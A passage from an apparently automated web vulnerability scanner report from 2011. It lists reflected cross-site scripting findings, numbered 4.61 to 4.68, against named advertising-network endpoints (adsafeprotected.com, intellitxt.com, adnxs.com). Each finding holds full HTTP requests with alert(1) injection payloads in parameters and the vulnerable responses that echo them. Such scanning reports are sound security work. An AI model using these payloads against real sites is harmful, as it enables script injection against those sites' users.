Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F6EBC3827678CA9C1C278DAD00E99C2; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
PpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghn
...[SNIP]...

4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb011"-alert(1)-"6b5839ea77b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A582730ED9D3E7ACA7D653A8A640404F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
TM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h32"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14d92"-alert(1)-"e11a01d09da was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=969C7D18C17E6CF125DE65C6192D6639; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
NTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h0b"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba4a"-alert(1)-"51d574e77ee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F645E89D2DE63B512888E6C0840EEADD; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
jAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25gx4"
};


(function(){v
...[SNIP]...

4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e6ebd%3balert(1)//7662a95d143 was submitted in the jscallback parameter. This input was echoed as e6ebd;alert(1)//7662a95d143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20111002235932&cc=us&hk=1&ipid=17560&mh=e4d7a117d40d51c07461e5ec2ec357de&pvm=8a1bde305c8c7fc10d8c64ac123edbc3&pvu=D86A9C320A56454497A101B6CE3CD363&rcc=--&so=0&prf=ll%3A7961%7Cintl%3A15542%7Cadvint%3A15578%7Cadvl%3A15578%7Ctl%3A15579&jscallback=$iTXT.js.callback1e6ebd%3balert(1)//7662a95d143 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 03 Oct 2011 00:02:09 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1e6ebd;alert(1)//7662a95d143();}catch(e){}

4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf91d'-alert(1)-'82f479773ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=17560&cf91d'-alert(1)-'82f479773ab=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11466
Date: Mon, 03 Oct 2011 00:00:59 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
18'};$iTXT.js.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='21';$iTXT.js.serverUrl='http://goal.us.intellitxt.com';$iTXT.js.serverName='goal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=17560&cf91d'-alert(1)-'82f479773ab=1';$iTXT.js.ipid='17560';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=80000&c
...[SNIP]...

4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce85d%3balert(1)//92071f6f8b5 was submitted in the jscallback parameter. This input was echoed as ce85d;alert(1)//92071f6f8b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0ce85d%3balert(1)//92071f6f8b5 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7509
Date: Mon, 03 Oct 2011 00:02:54 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0ce85d;alert(1)//92071f6f8b5({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75336"-alert(1)-"a0600fbcc40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0&75336"-alert(1)-"a0600fbcc40=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7490
Date: Mon, 03 Oct 2011 00:03:04 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
17560,"jscallback":"$iTXT.js.callback0","reg":"--","refurl":"http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run","rcc":"--","cc":"us","75336"-alert(1)-"a0600fbcc40":"1"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}$iTXT.glob.params.set
...[SNIP]...

4.68. http://ib.adnxs.com/ab [ccd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971ff'-alert(1)-'79037dbfcc8 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C